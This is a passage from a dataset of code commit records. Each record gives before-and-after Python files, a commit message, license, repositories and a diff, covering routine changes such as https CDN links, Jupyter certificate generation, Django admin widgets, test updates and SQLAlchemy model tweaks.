external_requests_post.return_value.status_code = 200
response = self._post()
assert response.status_code == 303
new_page = self.client.get(response.location)
assert "Thank you for your message" in new_page.get_data(as_text=True)
|
Add tests for feedback submission view.
|
Add tests for feedback submission view.
https://trello.com/c/Uak7y047/8-feedback-forms
|
Python
|
mit
|
alphagov/digitalmarketplace-buyer-frontend,alphagov/digitalmarketplace-buyer-frontend,alphagov/digitalmarketplace-buyer-frontend,alphagov/digitalmarketplace-buyer-frontend
|
---
+++
@@ -0,0 +1,23 @@
+import mock
+from ...helpers import BaseApplicationTest
+
+
+class TestFeedbackForm(BaseApplicationTest):
+ def _post(self):
+ return self.client.post('/feedback', data={
+ 'uri': 'test:some-uri',
+ 'what_doing': 'test: what doing text',
+ 'what_happened': 'test: what happened text'})
+
+ @mock.patch('requests.post')
+ def test_google_gone_gives_503(self, external_requests_post):
+ assert self._post().status_code == 503
+
+ @mock.patch('requests.post')
+ def test_feedback_submission(self, external_requests_post):
+ external_requests_post.return_value.status_code = 200
+ response = self._post()
+
+ assert response.status_code == 303
+ new_page = self.client.get(response.location)
+ assert "Thank you for your message" in new_page.get_data(as_text=True)
|
|
8136a0badc5c3eebb4e7772c1ff9a950f82e04fe
|
emstrack/forms.py
|
emstrack/forms.py
|
from django.contrib.gis.forms import widgets
class LeafletPointWidget(widgets.BaseGeometryWidget):
template_name = 'leaflet/leaflet.html'
class Media:
css = {
'all': ('http://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
'leaflet/css/location_form.css',
'leaflet/css/LeafletWidget.css')
}
js = (
'http://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
'leaflet/js/LeafletWidget.js'
)
def render(self, name, value, attrs=None):
# add point
if value:
attrs.update({ 'point': { 'x': value.x,
'y': value.y,
'z': value.z,
'srid': value.srid }
})
return super().render(name, value, attrs)
|
from django.contrib.gis.forms import widgets
class LeafletPointWidget(widgets.BaseGeometryWidget):
template_name = 'leaflet/leaflet.html'
class Media:
css = {
'all': ('https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
'leaflet/css/location_form.css',
'leaflet/css/LeafletWidget.css')
}
js = (
'https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
'leaflet/js/LeafletWidget.js'
)
def render(self, name, value, attrs=None):
# add point
if value:
attrs.update({ 'point': { 'x': value.x,
'y': value.y,
'z': value.z,
'srid': value.srid }
})
return super().render(name, value, attrs)
|
Update leaflet request to be over https
|
Update leaflet request to be over https
|
Python
|
bsd-3-clause
|
EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient
|
---
+++
@@ -5,12 +5,12 @@
class Media:
css = {
- 'all': ('http://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
+ 'all': ('https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.css',
'leaflet/css/location_form.css',
'leaflet/css/LeafletWidget.css')
}
js = (
- 'http://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
+ 'https://cdn.leafletjs.com/leaflet/v0.7.7/leaflet.js',
'leaflet/js/LeafletWidget.js'
)
|
1c3ff4552b82183263ead0aefe47b867a7b2022e
|
10_anaconda/jupyter_notebook_config.py
|
10_anaconda/jupyter_notebook_config.py
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from jupyter_core.paths import jupyter_data_dir
import subprocess
import os
import errno
import stat
c = get_config()
c.NotebookApp.ip = '*'
c.NotebookApp.port = 8888
c.NotebookApp.open_browser = False
# Generate a self-signed certificate
if 'GEN_CERT' in os.environ:
dir_name = jupyter_data_dir()
pem_file = os.path.join(dir_name, 'notebook.pem')
try:
os.makedirs(dir_name)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
pass
else:
raise
# Generate a certificate if one doesn't exist on disk
subprocess.check_call(['openssl', 'req', '-new',
'-newkey', 'rsa:2048',
'-days', '365',
'-nodes', '-x509',
'-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
'-keyout', pem_file,
'-out', pem_file])
# Restrict access to the file
os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
c.NotebookApp.certfile = pem_file
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from jupyter_core.paths import jupyter_data_dir
import subprocess
import os
import os.path
import errno
import stat
c = get_config()
c.NotebookApp.ip = '*'
c.NotebookApp.port = 8888
c.NotebookApp.open_browser = False
# Generate a self-signed certificate
if 'GEN_CERT' in os.environ:
dir_name = jupyter_data_dir()
pem_file = os.path.join(dir_name, 'notebook.pem')
if not os.path.isfile(pem_file):
try:
os.makedirs(dir_name)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
pass
else:
raise
# Generate a certificate if one doesn't exist on disk
subprocess.check_call(['openssl', 'req', '-new',
'-newkey', 'rsa:2048',
'-days', '365',
'-nodes', '-x509',
'-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
'-keyout', pem_file,
'-out', pem_file])
# Restrict access to the file
os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
c.NotebookApp.certfile = pem_file
|
Fix certificate regenerating each startup
|
Fix certificate regenerating each startup
|
Python
|
apache-2.0
|
LamDang/docker-datascience,LamDang/docker-datascience
|
---
+++
@@ -4,6 +4,7 @@
from jupyter_core.paths import jupyter_data_dir
import subprocess
import os
+import os.path
import errno
import stat
@@ -16,21 +17,22 @@
if 'GEN_CERT' in os.environ:
dir_name = jupyter_data_dir()
pem_file = os.path.join(dir_name, 'notebook.pem')
- try:
- os.makedirs(dir_name)
- except OSError as exc: # Python >2.5
- if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
- pass
- else:
- raise
- # Generate a certificate if one doesn't exist on disk
- subprocess.check_call(['openssl', 'req', '-new',
- '-newkey', 'rsa:2048',
- '-days', '365',
- '-nodes', '-x509',
- '-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
- '-keyout', pem_file,
- '-out', pem_file])
- # Restrict access to the file
- os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
+ if not os.path.isfile(pem_file):
+ try:
+ os.makedirs(dir_name)
+ except OSError as exc: # Python >2.5
+ if exc.errno == errno.EEXIST and os.path.isdir(dir_name):
+ pass
+ else:
+ raise
+ # Generate a certificate if one doesn't exist on disk
+ subprocess.check_call(['openssl', 'req', '-new',
+ '-newkey', 'rsa:2048',
+ '-days', '365',
+ '-nodes', '-x509',
+ '-subj', '/C=XX/ST=XX/L=XX/O=generated/CN=generated',
+ '-keyout', pem_file,
+ '-out', pem_file])
+ # Restrict access to the file
+ os.chmod(pem_file, stat.S_IRUSR | stat.S_IWUSR)
c.NotebookApp.certfile = pem_file
|
a70bb058bd93831b755079f5fee495088b620c6d
|
taiga/locale/api.py
|
taiga/locale/api.py
|
# Copyright (C) 2015 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2015 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2015 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from taiga.base import response
from taiga.base.api.viewsets import ReadOnlyListViewSet
from . import permissions
class LocalesViewSet(ReadOnlyListViewSet):
permission_classes = (permissions.LocalesPermission,)
def list(self, request, *args, **kwargs):
locales = [{"code": c, "name": n} for c, n in settings.LANGUAGES]
return response.Ok(locales)
|
# Copyright (C) 2015 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2015 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2015 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from taiga.base import response
from taiga.base.api.viewsets import ReadOnlyListViewSet
from . import permissions
class LocalesViewSet(ReadOnlyListViewSet):
permission_classes = (permissions.LocalesPermission,)
def list(self, request, *args, **kwargs):
locales = [{"code": c, "name": n, "bidi": c in settings.LANGUAGES_BIDI} for c, n in settings.LANGUAGES]
return response.Ok(locales)
|
Add bidi (right-to-left layout) attr to locale resource
|
Add bidi (right-to-left layout) attr to locale resource
|
Python
|
agpl-3.0
|
crr0004/taiga-back,CoolCloud/taiga-back,Rademade/taiga-back,seanchen/taiga-back,Tigerwhit4/taiga-back,seanchen/taiga-back,astronaut1712/taiga-back,dycodedev/taiga-back,dycodedev/taiga-back,WALR/taiga-back,forging2012/taiga-back,xdevelsistemas/taiga-back-community,xdevelsistemas/taiga-back-community,rajiteh/taiga-back,Tigerwhit4/taiga-back,taigaio/taiga-back,EvgeneOskin/taiga-back,CMLL/taiga-back,EvgeneOskin/taiga-back,Rademade/taiga-back,EvgeneOskin/taiga-back,seanchen/taiga-back,rajiteh/taiga-back,CMLL/taiga-back,gauravjns/taiga-back,obimod/taiga-back,CMLL/taiga-back,astagi/taiga-back,dayatz/taiga-back,astronaut1712/taiga-back,CMLL/taiga-back,astagi/taiga-back,joshisa/taiga-back,coopsource/taiga-back,dayatz/taiga-back,gauravjns/taiga-back,forging2012/taiga-back,joshisa/taiga-back,gam-phon/taiga-back,Rademade/taiga-back,Tigerwhit4/taiga-back,CoolCloud/taiga-back,crr0004/taiga-back,coopsource/taiga-back,obimod/taiga-back,dycodedev/taiga-back,gam-phon/taiga-back,WALR/taiga-back,gam-phon/taiga-back,gam-phon/taiga-back,taigaio/taiga-back,xdevelsistemas/taiga-back-community,CoolCloud/taiga-back,jeffdwyatt/taiga-back,taigaio/taiga-back,coopsource/taiga-back,forging2012/taiga-back,WALR/taiga-back,gauravjns/taiga-back,joshisa/taiga-back,crr0004/taiga-back,jeffdwyatt/taiga-back,forging2012/taiga-back,CoolCloud/taiga-back,seanchen/taiga-back,EvgeneOskin/taiga-back,joshisa/taiga-back,obimod/taiga-back,Rademade/taiga-back,WALR/taiga-back,Rademade/taiga-back,jeffdwyatt/taiga-back,dycodedev/taiga-back,bdang2012/taiga-back-casting,obimod/taiga-back,astronaut1712/taiga-back,astagi/taiga-back,dayatz/taiga-back,rajiteh/taiga-back,astagi/taiga-back,bdang2012/taiga-back-casting,crr0004/taiga-back,gauravjns/taiga-back,coopsource/taiga-back,bdang2012/taiga-back-casting,astronaut1712/taiga-back,jeffdwyatt/taiga-back,Tigerwhit4/taiga-back,bdang2012/taiga-back-casting,rajiteh/taiga-back
|
---
+++
@@ -26,5 +26,5 @@
permission_classes = (permissions.LocalesPermission,)
def list(self, request, *args, **kwargs):
- locales = [{"code": c, "name": n} for c, n in settings.LANGUAGES]
+ locales = [{"code": c, "name": n, "bidi": c in settings.LANGUAGES_BIDI} for c, n in settings.LANGUAGES]
return response.Ok(locales)
|
e0e1b41c93fdb0c148638f6c2f33e3d47c3ec17b
|
slot/routes.py
|
slot/routes.py
|
from slot import basic_auth
from flask_login import login_required
from slot.main import app
from slot import controller as con
@app.route('/')
@app.route('/dashboard')
@login_required
def dashboard():
return con.dashboard()
@app.route('/new', methods=['GET', 'POST'])
@login_required
def render_new_procedure_form():
return con.render_new_procedure_form()
@app.route('/sms', methods=['POST'])
@basic_auth.requires_auth
def receive_sms():
return con.receive_sms()
@app.route('/complete', methods=['POST'])
@login_required
def complete_procedure():
return con.complete_procedure()
|
from flask_login import login_required
from slot.main import app
from slot import controller as con
from slot import basic_auth
@app.route('/')
@app.route('/dashboard')
@login_required
def dashboard():
return con.dashboard()
@app.route('/new', methods=['GET', 'POST'])
@login_required
def render_new_procedure_form():
return con.render_new_procedure_form()
@app.route('/sms', methods=['POST'])
@basic_auth.requires_auth
def receive_sms():
return con.receive_sms()
@app.route('/complete', methods=['POST'])
@login_required
def complete_procedure():
return con.complete_procedure()
|
Move import statement so that it was with other local imports
|
Move import statement so that it was with other local imports
|
Python
|
mit
|
nhshd-slot/SLOT,nhshd-slot/SLOT,nhshd-slot/SLOT
|
---
+++
@@ -1,8 +1,8 @@
-from slot import basic_auth
from flask_login import login_required
from slot.main import app
from slot import controller as con
+from slot import basic_auth
@app.route('/')
|
0a0ae457555be952e02b51642b7c9bdaf85a7e5c
|
trac/upgrades/db20.py
|
trac/upgrades/db20.py
|
from trac.db import Table, Column, Index, DatabaseManager
from trac.core import TracError
from trac.versioncontrol.cache import CACHE_YOUNGEST_REV
def do_upgrade(env, ver, cursor):
"""Modify the repository cache scheme (if needed)
Now we use the 'youngest_rev' entry in the system table
to explicitly store the youngest rev in the cache.
"""
db = env.get_db_cnx()
try:
repos = env.get_repository()
youngest = repos.get_youngest_rev_in_cache(db) or ''
# deleting first, for the 0.11dev and 0.10.4dev users
cursor.execute("DELETE FROM system WHERE name=%s",
(CACHE_YOUNGEST_REV,))
cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
(CACHE_YOUNGEST_REV, youngest))
except TracError: # no repository available
pass
|
from trac.db import Table, Column, Index, DatabaseManager
from trac.core import TracError
from trac.versioncontrol.cache import CACHE_YOUNGEST_REV
def do_upgrade(env, ver, cursor):
"""Modify the repository cache scheme (if needed)
Now we use the 'youngest_rev' entry in the system table
to explicitly store the youngest rev in the cache.
"""
db = env.get_db_cnx()
try:
repos = env.get_repository()
youngest = repos.get_youngest_rev_in_cache(db) or ''
except TracError: # no repository available
youngest = ''
# deleting first, for the 0.11dev and 0.10.4dev users
cursor.execute("DELETE FROM system WHERE name=%s",
(CACHE_YOUNGEST_REV,))
cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
(CACHE_YOUNGEST_REV, youngest))
|
Make db upgrade step 20 more robust.
|
Make db upgrade step 20 more robust.
git-svn-id: eda3d06fcef731589ace1b284159cead3416df9b@5815 af82e41b-90c4-0310-8c96-b1721e28e2e2
|
Python
|
bsd-3-clause
|
walty8/trac,netjunki/trac-Pygit2,jun66j5/trac-ja,walty8/trac,netjunki/trac-Pygit2,jun66j5/trac-ja,walty8/trac,jun66j5/trac-ja,jun66j5/trac-ja,walty8/trac,netjunki/trac-Pygit2
|
---
+++
@@ -12,11 +12,11 @@
try:
repos = env.get_repository()
youngest = repos.get_youngest_rev_in_cache(db) or ''
- # deleting first, for the 0.11dev and 0.10.4dev users
- cursor.execute("DELETE FROM system WHERE name=%s",
- (CACHE_YOUNGEST_REV,))
- cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
- (CACHE_YOUNGEST_REV, youngest))
except TracError: # no repository available
- pass
+ youngest = ''
+ # deleting first, for the 0.11dev and 0.10.4dev users
+ cursor.execute("DELETE FROM system WHERE name=%s",
+ (CACHE_YOUNGEST_REV,))
+ cursor.execute("INSERT INTO system (name, value) VALUES (%s, %s)",
+ (CACHE_YOUNGEST_REV, youngest))
|
3bc8a7208865bac6364ce65410dd828e576c30c1
|
flask_boost/project/application/models/user.py
|
flask_boost/project/application/models/user.py
|
# coding: utf-8
import datetime
from ._base import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
email = db.Column(db.String(50))
avatar = db.Column(db.String(200))
password = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.datetime.now)
def __repr__(self):
return '<User %s>' % self.name
|
# coding: utf-8
import datetime
from ._base import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
email = db.Column(db.String(50), unique=True)
avatar = db.Column(db.String(200))
password = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.datetime.now)
def __repr__(self):
return '<User %s>' % self.name
|
Add unique constraint to User.email
|
Add unique constraint to User.email
|
Python
|
mit
|
1045347128/Flask-Boost,1045347128/Flask-Boost,hustlzp/Flask-Boost,1045347128/Flask-Boost,hustlzp/Flask-Boost,hustlzp/Flask-Boost,1045347128/Flask-Boost,hustlzp/Flask-Boost
|
---
+++
@@ -6,7 +6,7 @@
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
- email = db.Column(db.String(50))
+ email = db.Column(db.String(50), unique=True)
avatar = db.Column(db.String(200))
password = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.datetime.now)
|
a2c69058316971cd753edba607160d62df337b77
|
tests/test_middleware.py
|
tests/test_middleware.py
|
"""Tests for respite.middleware."""
from nose.tools import *
from urllib import urlencode
from django.utils import simplejson as json
from django.test.client import Client, RequestFactory
from respite.middleware import *
client = Client()
def test_json_middleware():
request = RequestFactory().post(
path = '/',
data = json.dumps({
'foo': 'foo',
'bar': 'bar',
'baz': 'baz'
}),
content_type = 'application/json'
)
JsonMiddleware().process_request(request)
assert_equal(request.POST, {
'foo': ['foo'],
'bar': ['bar'],
'baz': ['baz']
})
def test_http_method_override_middleware():
request = RequestFactory().post(
path = '/',
data = {
'foo': 'bar',
'_method': 'PUT'
}
)
HttpMethodOverrideMiddleware().process_request(request)
assert_equal(request.method, 'PUT')
assert_equal(request.POST, {})
def test_http_put_middleware():
request = RequestFactory().put(
path = '/',
data = urlencode({
'foo': 'bar'
}),
content_type = "application/x-www-form-urlencoded"
)
HttpPutMiddleware().process_request(request)
assert_equal(request.PUT, {
'foo': ['bar']
})
|
"""Tests for respite.middleware."""
from nose.tools import *
from urllib import urlencode
from django.utils import simplejson as json
from django.test.client import Client, RequestFactory
from respite.middleware import *
client = Client()
def test_json_middleware():
request = RequestFactory().post(
path = '/',
data = json.dumps({
'foo': 'foo',
'bar': 'bar',
'baz': 'baz',
'hogera': [
{'hoge': 'hoge'},
{'fuga': 'fuga'}
]
}),
content_type = 'application/json'
)
JsonMiddleware().process_request(request)
assert_equal(request.POST, {
'foo': ['foo'],
'bar': ['bar'],
'baz': ['baz'],
'hogera': [
{'hoge': ['hoge']},
{'fuga': ['fuga']}
]
})
def test_http_method_override_middleware():
request = RequestFactory().post(
path = '/',
data = {
'foo': 'bar',
'_method': 'PUT'
}
)
HttpMethodOverrideMiddleware().process_request(request)
assert_equal(request.method, 'PUT')
assert_equal(request.POST, {})
def test_http_put_middleware():
request = RequestFactory().put(
path = '/',
data = urlencode({
'foo': 'bar'
}),
content_type = "application/x-www-form-urlencoded"
)
HttpPutMiddleware().process_request(request)
assert_equal(request.PUT, {
'foo': ['bar']
})
|
Modify test to test for nested JSON
|
Modify test to test for nested JSON
|
Python
|
mit
|
jgorset/django-respite,jgorset/django-respite,jgorset/django-respite
|
---
+++
@@ -17,7 +17,11 @@
data = json.dumps({
'foo': 'foo',
'bar': 'bar',
- 'baz': 'baz'
+ 'baz': 'baz',
+ 'hogera': [
+ {'hoge': 'hoge'},
+ {'fuga': 'fuga'}
+ ]
}),
content_type = 'application/json'
)
@@ -27,7 +31,11 @@
assert_equal(request.POST, {
'foo': ['foo'],
'bar': ['bar'],
- 'baz': ['baz']
+ 'baz': ['baz'],
+ 'hogera': [
+ {'hoge': ['hoge']},
+ {'fuga': ['fuga']}
+ ]
})
def test_http_method_override_middleware():
|
93913720a88c601db6d0094f346bbdeb7b45ed34
|
numpy_groupies/__init__.py
|
numpy_groupies/__init__.py
|
def dummy_no_impl(*args, **kwargs):
raise NotImplementedError("You may need to install another package (numpy, "
"weave, or numba) to access a working implementation.")
from .aggregate_purepy import aggregate as aggregate_py
aggregate = aggregate_py
try:
import numpy as np
except ImportError:
aggregate_np = aggregate_ufunc = dummy_no_impl
multi_arange = multi_cumsum = label_contiguous_1d = dummy_no_impl
else:
from .aggregate_numpy import aggregate
aggregate_np = aggregate
from .aggregate_numpy_ufunc import aggregate as aggregate_ufunc
from .misc_tools_numpy import (multi_arange,
multi_cumsum,
label_contiguous_1d,
find_contiguous_boundaries,
relabel_groups_masked,
relabel_groups_unique,
unpack)
try:
import numba
except ImportError:
aggregate_nb = None
else:
from .aggregate_numba import aggregate as aggregate_nb
aggregate = aggregate_nb
try:
try:
import weave
except ImportError:
from scipy import weave
except ImportError:
aggregate_wv = None
else:
from .aggregate_weave import aggregate as aggregate_wv, step_indices, step_count
aggregate = aggregate_wv
def uaggregate(group_idx, a, **kwargs):
return unpack(group_idx, aggregate(group_idx, a, **kwargs))
|
def dummy_no_impl(*args, **kwargs):
raise NotImplementedError("You may need to install another package (numpy, "
"weave, or numba) to access a working implementation.")
from .aggregate_purepy import aggregate as aggregate_py
aggregate = aggregate_py
try:
import numpy as np
except ImportError:
aggregate_np = aggregate_ufunc = dummy_no_impl
multi_arange = multi_cumsum = label_contiguous_1d = dummy_no_impl
else:
from .aggregate_numpy import aggregate
aggregate_np = aggregate
from .aggregate_numpy_ufunc import aggregate as aggregate_ufunc
from .misc_tools_numpy import (multi_arange,
multi_cumsum,
label_contiguous_1d,
find_contiguous_boundaries,
relabel_groups_masked,
relabel_groups_unique,
unpack)
try:
try:
import weave
except ImportError:
from scipy import weave
except ImportError:
aggregate_wv = None
else:
from .aggregate_weave import aggregate as aggregate_wv, step_indices, step_count
aggregate = aggregate_wv
try:
import numba
except ImportError:
aggregate_nb = None
else:
from .aggregate_numba import aggregate as aggregate_nb, step_indices, step_count
aggregate = aggregate_nb
def uaggregate(group_idx, a, **kwargs):
return unpack(group_idx, aggregate(group_idx, a, **kwargs))
|
Make numba the default implementation, as it beats weave in major parts of the benchmarks now
|
Make numba the default implementation, as it beats weave in major parts of the benchmarks now
|
Python
|
bsd-2-clause
|
ml31415/numpy-groupies
|
---
+++
@@ -24,15 +24,6 @@
try:
- import numba
-except ImportError:
- aggregate_nb = None
-else:
- from .aggregate_numba import aggregate as aggregate_nb
- aggregate = aggregate_nb
-
-
-try:
try:
import weave
except ImportError:
@@ -44,5 +35,14 @@
aggregate = aggregate_wv
+try:
+ import numba
+except ImportError:
+ aggregate_nb = None
+else:
+ from .aggregate_numba import aggregate as aggregate_nb, step_indices, step_count
+ aggregate = aggregate_nb
+
+
def uaggregate(group_idx, a, **kwargs):
return unpack(group_idx, aggregate(group_idx, a, **kwargs))
|
d30c3b9c574566d9c69fc1322b6a2dfec3a6eb67
|
opps/core/admin/article.py
|
opps/core/admin/article.py
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from opps.core.models import Post
class PostAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("title",)}
def save_model(self, request, obj, form, change):
if not obj.user:
obj.user = request.user
obj.save()
admin.site.register(Post, PostAdmin)
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from django import forms
from opps.core.models import Post
from redactor.widgets import RedactorEditor
class PostAdminForm(forms.ModelForm):
class Meta:
model = Post
widgets = {'content': RedactorEditor(),}
class PostAdmin(admin.ModelAdmin):
form = PostAdminForm
prepopulated_fields = {"slug": ("title",)}
def save_model(self, request, obj, form, change):
if not obj.user:
obj.user = request.user
obj.save()
admin.site.register(Post, PostAdmin)
|
Create post admin form, custom content field add texteditor
|
Create post admin form, custom content field
add texteditor
|
Python
|
mit
|
YACOWS/opps,YACOWS/opps,williamroot/opps,opps/opps,williamroot/opps,jeanmask/opps,opps/opps,williamroot/opps,opps/opps,jeanmask/opps,YACOWS/opps,YACOWS/opps,opps/opps,jeanmask/opps,jeanmask/opps,williamroot/opps
|
---
+++
@@ -1,11 +1,21 @@
# -*- coding: utf-8 -*-
from django.contrib import admin
+from django import forms
from opps.core.models import Post
+from redactor.widgets import RedactorEditor
+
+
+
+class PostAdminForm(forms.ModelForm):
+ class Meta:
+ model = Post
+ widgets = {'content': RedactorEditor(),}
class PostAdmin(admin.ModelAdmin):
+ form = PostAdminForm
prepopulated_fields = {"slug": ("title",)}
def save_model(self, request, obj, form, change):
|
428a6cf3b0af58ba6b3a9514161db2a1151864b0
|
slither/tests/svgTest.py
|
slither/tests/svgTest.py
|
# usr/bin/env python3
# svgTest.py - Test Slither's SVG support
import slither
if slither.svgSupport:
print("We have SVG support!")
else:
print("No SVGs today :(")
svg = slither.Sprite()
svg.addCostume("assets/svg Logo.svg", "svg")
svg.costumeNumber = 1
svg.scale = 1
svg.showBoundingBox = False
svg.goto(100, 300)
svg2 = slither.Sprite()
svg2.addCostume("assets/svg Logo.svg", "svg")
svg2.costumeNumber = 1
svg2.scale = 5
svg2.showBoundingBox = False
svg2.goto(500, 300)
slither.setup() # Begin slither
def run_a_frame():
pass
slither.runMainLoop(run_a_frame)
|
# usr/bin/env python3
# svgTest.py - Test Slither's SVG support
import slither
if slither.svgSupport:
print("We have SVG support!")
else:
print("No SVGs today :(")
svg = slither.Sprite()
svg.addCostume("assets/SVG Logo.svg", "svg")
svg.costumeNumber = 1
svg.scale = 1
svg.showBoundingBox = False
svg.goto(100, 300)
svg2 = slither.Sprite()
svg2.addCostume("assets/SVG Logo.svg", "svg")
svg2.costumeNumber = 1
svg2.scale = 5
svg2.showBoundingBox = False
svg2.goto(500, 300)
slither.setup() # Begin slither
def run_a_frame():
pass
slither.runMainLoop(run_a_frame)
|
Fix test to work on Linux
|
Fix test to work on Linux
|
Python
|
mit
|
PySlither/Slither,PySlither/Slither
|
---
+++
@@ -9,14 +9,14 @@
print("No SVGs today :(")
svg = slither.Sprite()
-svg.addCostume("assets/svg Logo.svg", "svg")
+svg.addCostume("assets/SVG Logo.svg", "svg")
svg.costumeNumber = 1
svg.scale = 1
svg.showBoundingBox = False
svg.goto(100, 300)
svg2 = slither.Sprite()
-svg2.addCostume("assets/svg Logo.svg", "svg")
+svg2.addCostume("assets/SVG Logo.svg", "svg")
svg2.costumeNumber = 1
svg2.scale = 5
svg2.showBoundingBox = False
|
20f4a6ee8421a9827ff04f0fc3b065377775b860
|
test/single_test.py
|
test/single_test.py
|
import sys
import unittest
from unittest import TestSuite
def suite(test_name):
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(test_name))
return suite
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage {test_name}")
sys.exit(1)
runner = unittest.TextTestRunner()
runner.run(suite(sys.argv[1]))
|
import sys
import unittest
from unittest import TestSuite
def suite(test_name):
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(test_name))
return suite
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage {test_name}")
sys.exit(1)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite(sys.argv[1]))
|
Change single test verbosity to 2
|
Change single test verbosity to 2
|
Python
|
mit
|
JakubPetriska/poker-cfr,JakubPetriska/poker-cfr
|
---
+++
@@ -14,5 +14,5 @@
print("Usage {test_name}")
sys.exit(1)
- runner = unittest.TextTestRunner()
+ runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite(sys.argv[1]))
|
e5fdd60d9134bdb2e234b3eaffa2812c5ac288c9
|
tests/core_tests.py
|
tests/core_tests.py
|
# -*- coding: utf-8 -*-
import datetime
from openfisca_tunisia import TunisiaTaxBenefitSystem
from openfisca_tunisia.scenarios import init_single_entity
tax_benefit_system = TunisiaTaxBenefitSystem()
def check_1_parent(year = 2011):
scenario = init_single_entity(
tax_benefit_system.new_scenario(),
axes = [dict(
count = 3,
name = 'salaire_imposable',
max = 100000,
min = 0,
)],
period = year,
parent1 = dict(date_naissance = datetime.date(year - 40, 1, 1)),
)
simulation = scenario.new_simulation()
revenu_disponible = simulation.calculate('revenu_disponible', period = year)
def test_1_parent():
for year in range(2009, 2011):
yield check_1_parent, year
if __name__ == '__main__':
import logging
import sys
logging.basicConfig(level = logging.ERROR, stream = sys.stdout)
test_1_parent()
# test_1_parent_2_enfants()
# test_1_parent_2_enfants_1_column()
|
# -*- coding: utf-8 -*-
import datetime
from openfisca_tunisia import TunisiaTaxBenefitSystem
from openfisca_tunisia.scenarios import init_single_entity
tax_benefit_system = TunisiaTaxBenefitSystem()
def check_1_parent(year = 2011):
scenario = init_single_entity(
tax_benefit_system.new_scenario(),
axes = [[
dict(
count = 3,
name = 'salaire_imposable',
max = 100000,
min = 0,
)
]],
period = year,
parent1 = dict(date_naissance = datetime.date(year - 40, 1, 1)),
)
simulation = scenario.new_simulation()
revenu_disponible = simulation.calculate('revenu_disponible', period = year)
def test_1_parent():
for year in range(2009, 2011):
yield check_1_parent, year
if __name__ == '__main__':
import logging
import sys
logging.basicConfig(level = logging.ERROR, stream = sys.stdout)
test_1_parent()
# test_1_parent_2_enfants()
# test_1_parent_2_enfants_1_column()
|
Fix KeyError on test with axis
|
Fix KeyError on test with axis
|
Python
|
agpl-3.0
|
openfisca/openfisca-tunisia,openfisca/openfisca-tunisia
|
---
+++
@@ -13,12 +13,14 @@
def check_1_parent(year = 2011):
scenario = init_single_entity(
tax_benefit_system.new_scenario(),
- axes = [dict(
- count = 3,
- name = 'salaire_imposable',
- max = 100000,
- min = 0,
- )],
+ axes = [[
+ dict(
+ count = 3,
+ name = 'salaire_imposable',
+ max = 100000,
+ min = 0,
+ )
+ ]],
period = year,
parent1 = dict(date_naissance = datetime.date(year - 40, 1, 1)),
)
|
bb007f6a2c0563d9fb908fae98b0e950af936810
|
uchan/lib/models/post.py
|
uchan/lib/models/post.py
|
from sqlalchemy import Column, Integer, String, BigInteger, ForeignKey
from sqlalchemy.orm import relationship
from uchan.database import ModelBase
class Post(ModelBase):
__tablename__ = 'post'
id = Column(Integer(), primary_key=True)
